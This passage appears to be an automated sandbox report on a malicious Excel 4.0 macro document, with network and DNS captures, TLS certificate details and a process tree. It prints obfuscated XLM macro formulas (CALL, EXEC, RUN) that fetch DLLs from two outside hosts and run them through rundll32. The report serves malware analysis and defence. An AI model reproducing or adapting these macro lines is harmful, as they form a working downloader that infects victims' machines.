UMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                                                                                                                                                                      "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                                                                                                                                                                      "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      May 12, 2021 21:14:16.590965033 CEST49696443192.168.2.7192.185.39.58
                                                                                                                                                                                                                      May 12, 2021 21:14:16.751008034 CEST44349696192.185.39.58192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:16.751106024 CEST49696443192.168.2.7192.185.39.58
                                                                                                                                                                                                                      May 12, 2021 21:14:16.753143072 CEST49696443192.168.2.7192.185.39.58
                                                                                                                                                                                                                      May 12, 2021 21:14:16.911761999 CEST44349696192.185.39.58192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:16.985055923 CEST44349696192.185.39.58192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:16.985097885 CEST44349696192.185.39.58192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:16.985111952 CEST44349696192.185.39.58192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:16.985120058 CEST49696443192.168.2.7192.185.39.58
                                                                                                                                                                                                                      May 12, 2021 21:14:16.985146046 CEST49696443192.168.2.7192.185.39.58
                                                                                                                                                                                                                      May 12, 2021 21:14:16.996124983 CEST49696443192.168.2.7192.185.39.58
                                                                                                                                                                                                                      May 12, 2021 21:14:17.154994965 CEST44349696192.185.39.58192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:17.155457020 CEST44349696192.185.39.58192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:17.155559063 CEST49696443192.168.2.7192.185.39.58
                                                                                                                                                                                                                      May 12, 2021 21:14:17.156337023 CEST49696443192.168.2.7192.185.39.58
                                                                                                                                                                                                                      May 12, 2021 21:14:17.357965946 CEST44349696192.185.39.58192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:17.412483931 CEST44349696192.185.39.58192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:17.412667990 CEST49696443192.168.2.7192.185.39.58
                                                                                                                                                                                                                      May 12, 2021 21:14:17.412847996 CEST49696443192.168.2.7192.185.39.58
                                                                                                                                                                                                                      May 12, 2021 21:14:17.412918091 CEST44349696192.185.39.58192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:17.412971973 CEST49696443192.168.2.7192.185.39.58
                                                                                                                                                                                                                      May 12, 2021 21:14:17.489748001 CEST49698443192.168.2.7192.185.32.232
                                                                                                                                                                                                                      May 12, 2021 21:14:17.577756882 CEST44349696192.185.39.58192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:17.648061037 CEST44349698192.185.32.232192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:17.648232937 CEST49698443192.168.2.7192.185.32.232
                                                                                                                                                                                                                      May 12, 2021 21:14:17.648916006 CEST49698443192.168.2.7192.185.32.232
                                                                                                                                                                                                                      May 12, 2021 21:14:17.809278965 CEST44349698192.185.32.232192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:17.812905073 CEST44349698192.185.32.232192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:17.812944889 CEST44349698192.185.32.232192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:17.812964916 CEST44349698192.185.32.232192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:17.813004971 CEST49698443192.168.2.7192.185.32.232
                                                                                                                                                                                                                      May 12, 2021 21:14:17.813033104 CEST49698443192.168.2.7192.185.32.232
                                                                                                                                                                                                                      May 12, 2021 21:14:17.822004080 CEST49698443192.168.2.7192.185.32.232
                                                                                                                                                                                                                      May 12, 2021 21:14:18.024058104 CEST44349698192.185.32.232192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:18.031673908 CEST44349698192.185.32.232192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:18.031825066 CEST49698443192.168.2.7192.185.32.232
                                                                                                                                                                                                                      May 12, 2021 21:14:18.032620907 CEST49698443192.168.2.7192.185.32.232
                                                                                                                                                                                                                      May 12, 2021 21:14:18.190522909 CEST44349698192.185.32.232192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:18.681673050 CEST44349698192.185.32.232192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:18.681813955 CEST49698443192.168.2.7192.185.32.232
                                                                                                                                                                                                                      May 12, 2021 21:14:18.682029963 CEST44349698192.185.32.232192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:18.682075977 CEST49698443192.168.2.7192.185.32.232
                                                                                                                                                                                                                      May 12, 2021 21:14:48.682174921 CEST44349698192.185.32.232192.168.2.7

                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      May 12, 2021 21:13:59.679435015 CEST6245253192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:13:59.729752064 CEST53624528.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:00.893695116 CEST5782053192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:00.945133924 CEST53578208.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:04.349562883 CEST5084853192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:04.398363113 CEST53508488.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:04.442704916 CEST6124253192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:04.515603065 CEST53612428.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:05.909216881 CEST5856253192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:05.957914114 CEST53585628.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:11.165891886 CEST5659053192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:11.214657068 CEST53565908.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:11.234631062 CEST6050153192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:11.306921959 CEST53605018.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:12.281774998 CEST5377553192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:12.376241922 CEST53537758.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:12.827092886 CEST5183753192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:12.922458887 CEST53518378.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:13.844841957 CEST5183753192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:13.904934883 CEST53518378.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:14.853281021 CEST5183753192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:14.934639931 CEST53518378.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:16.531063080 CEST5541153192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:16.588973045 CEST53554118.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:16.601891041 CEST6366853192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:16.651472092 CEST53636688.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:16.891980886 CEST5183753192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:16.951903105 CEST53518378.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:17.428313971 CEST5464053192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:17.487384081 CEST53546408.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:18.166594028 CEST5873953192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:18.219002008 CEST53587398.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:20.247447968 CEST6033853192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:20.298130989 CEST53603388.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:20.945103884 CEST5183753192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:21.010276079 CEST53518378.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:21.659816027 CEST5871753192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:21.708542109 CEST53587178.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:22.172815084 CEST5976253192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:22.252585888 CEST53597628.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:23.187743902 CEST5432953192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:23.244987011 CEST53543298.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:25.427805901 CEST5805253192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:25.480015039 CEST53580528.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:26.337647915 CEST5400853192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:26.386578083 CEST53540088.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:27.348054886 CEST5945153192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:27.396784067 CEST53594518.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:28.379065037 CEST5291453192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:28.428435087 CEST53529148.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:29.819094896 CEST6456953192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:29.868120909 CEST53645698.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:31.385750055 CEST5281653192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:31.449348927 CEST53528168.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:31.703587055 CEST5078153192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:31.763199091 CEST53507818.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:33.120698929 CEST5423053192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:33.169713020 CEST53542308.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:34.069227934 CEST5491153192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:34.117929935 CEST53549118.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:35.341445923 CEST4995853192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:35.390192986 CEST53499588.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:36.572942019 CEST5086053192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:36.621762037 CEST53508608.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:38.131006002 CEST5045253192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:38.179780006 CEST53504528.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:14:55.121938944 CEST5973053192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:14:55.180742025 CEST53597308.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:15:03.704472065 CEST5931053192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:15:03.776784897 CEST53593108.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:15:41.472454071 CEST5191953192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:15:41.534256935 CEST53519198.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:15:51.369874001 CEST6429653192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:15:51.427200079 CEST53642968.8.8.8192.168.2.7
                                                                                                                                                                                                                      May 12, 2021 21:16:19.047452927 CEST5668053192.168.2.78.8.8.8
                                                                                                                                                                                                                      May 12, 2021 21:16:19.105853081 CEST53566808.8.8.8192.168.2.7

                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                      May 12, 2021 21:14:16.531063080 CEST192.168.2.78.8.8.80x5663Standard query (0)signifysystem.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                      May 12, 2021 21:14:17.428313971 CEST192.168.2.78.8.8.80xdc6eStandard query (0)fcventasyservicios.clA (IP address)IN (0x0001)

                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                      May 12, 2021 21:14:16.588973045 CEST8.8.8.8192.168.2.70x5663No error (0)signifysystem.com192.185.39.58A (IP address)IN (0x0001)
                                                                                                                                                                                                                      May 12, 2021 21:14:17.487384081 CEST8.8.8.8192.168.2.70xdc6eNo error (0)fcventasyservicios.cl192.185.32.232A (IP address)IN (0x0001)

                                                                                                                                                                                                                      HTTPS Packets

                                                                                                                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                      May 12, 2021 21:14:16.985111952 CEST192.185.39.58443192.168.2.749696CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                                                      May 12, 2021 21:14:17.812964916 CEST192.185.32.232443192.168.2.749698CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                                                                      Code Manipulations

                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Start time:21:14:10
                                                                                                                                                                                                                      Start date:12/05/2021
                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                      Imagebase:0x1e0000
                                                                                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Start time:21:14:18
                                                                                                                                                                                                                      Start date:12/05/2021
                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                                                                                                                                                                                                                      Imagebase:0x1190000
                                                                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Start time:21:14:19
                                                                                                                                                                                                                      Start date:12/05/2021
                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                                                                                                                                                                                                      Imagebase:0x1190000
                                                                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                      Code Analysis

                                                                                                                                                                                                                      Reset < >